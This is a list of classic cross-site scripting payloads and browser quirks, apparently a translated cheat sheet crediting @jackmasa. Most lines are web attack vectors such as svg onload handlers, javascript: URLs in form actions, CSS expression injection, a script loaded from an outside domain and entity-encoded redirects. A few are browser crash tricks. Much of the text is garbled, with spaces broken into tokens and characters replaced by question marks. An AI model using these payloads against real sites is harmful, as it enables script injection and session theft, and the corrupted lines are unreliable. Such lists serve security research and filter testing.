A collection of some classic XSS (cross-site scripting) code
<! -- "--!> <Input value = ">
<Script/onload = alert (1)> </script> IE9
<Style/onload = alert (1)>
Alert ([0x0D] --> [0x0D] 1 <! -- [0x0D])
1 <! -- I
Document. write (' \ 0">'); IE8
JSON. parse ('{"_ proto _": ["a", 1]}')
Location ++
IE valid syntax: me, ah = 1, B = [me, ah], alert (Me, Ah)
Alert ('aaa \ 0bbb ') IE only shows aaa http://jsbin.com/emekog
<Svg> <animation xLI: href = "javascript: alert (1)"> based on H5SC #88 # Opera
Function ('alert (arguments. callee. caller )')()
Firefox dos? While (1) find ();
<Div/style = x: expression (alert (URL = 1)>
Injecting <meta http-equiv = "X-UA-Compatible" content = "IE = EmulateIE7"> enables CSS expressions, breaking standards mode!
<Applet code = javascript: alert ('sgl ')> and <embed src = javascript: alert ('sgl')> umm... cute FF!
<Math> <script> sgl = '' </script> chrome firefox opera vector
<Svg> <oooooo/oooooooooo/onload = alert (1)> works on webkit ~
<Body/onload =\\\ vbs \\\:::::::: alert + 'X' + [000000] + 'O' + 'X' + [000000] ::::::::>
Vbs: alert +-[]
<Body/onload = vbs: alert ---- + -- + ---- 1 :::::::::>
Firefox vector <math> <a xlink: href = "// mmme. me"> click
<Svg> <script> a = '<svg/onload = alert (1)> </svg>'; alert (2) </script>
Inj> <script/src = // 0.gg/ xxxxx> <script>... </script> less xss
Webkit X-XSS-Protection header is enabled just now :P
<Svg/onload = domain = id> 22 letters e. g http://fiddle.jshell.net./KG7fR/5/show/
<? Xml encoding = "> <svg/onload = alert (1) //>">
<A " x </a> Distinctive IE
Also <a' = " '> <H1 "= ''> <1 h name = "<svg/onload = alert (1)>"> </1 h>
works in not-IE
Javascript = 1; for (javascript in RuntimeObject (); javascript = 'javascript'
<Body/onerror = alert (event)> Firefox Sandbox object
works in firefox
For (x in document. open); Crash your IE 6:>
LocalStorage. setItem ('secret', 1)
Only to find '? '. ToUpperCase () = '? '. ToUpperCase ()
J? H? T? W? Y? I? Length = 2
'? '. ToUpperCase () =' I'
Also '? '. ToUpperCase () = 'ss'
'?. ToUpperCase () = 'ff '// alike :? FI? FL? FFI? FFL? ST? ST
# Opera data: text/html; base64, <PH Nj cmlwdD5hb me-le-count-go to GVyd CgxKTwvc 2NyaXB0Pg >>>>>>>>>
Firefox always the most cute data: _, <script> alert (1) </script>
<A href = "ftp:/baidu.com"> xx </a>
Http ://?????????? Works in Firefox
RegExp. prototype. valueOf = alert,/-/; // IE, is there anything else?
Location = '& #106 & #97 & #118 & #97 & #115 & #99 & #114 & #105 & #112 & #116 & #58 & #97 & #108 & #101 & #114 & #116 & #40 & #49 & #41'
For ({} in {});
Simy deep dive http://jsbin.com/inekab for Opera only
<A href = https: http://www.google.com> x </a> That's a relative path?
Document. frames = window. frames
<A href = "jar: xxx" id = x> </a> x. protocol = 'HTTP: 'on # firefox
(0). constructor. constructor = function () {alert (eval (arguments [0]. substr (6)} Easy to decode jjencode and aaencode :D
127.0x000000001 = 127.0.0.1
<Input value = "& #31 sefewfewf"/> Chrome input value block
<Svg> <xmp>
Interesting isindex <isindex formaction = javascript: alert (1) type = submit>
Chrome: xx-> chrome: // crash/crash?
<Form action = javascript: alert (1)/> <input> Chrome input enter fucked!
<Form/> <button/> <keygen/> Chrome sends an empty key, which is funny ~_~
<Form/> <input/formaction = javascript: alert (1)> Because <form> is not a void element.
<form> <input/name = "isindex"> when the name is isindex, the key is not sent.
<Form id = x> </form> <button form = x formaction = "javascript: alert (1)"> X It is like http://html5sec.org/#1 but only Chrome supports it.
<Script language = "php"> echo 1?> Fascinating.
Fvck: (_? In? This) _ ['match'] (/. Element $/) & console. log (_)
Location. reload ('javascript: alert (1) ') // ie only, lol ~
{} Alert (1)
Twitter @jackmasa =P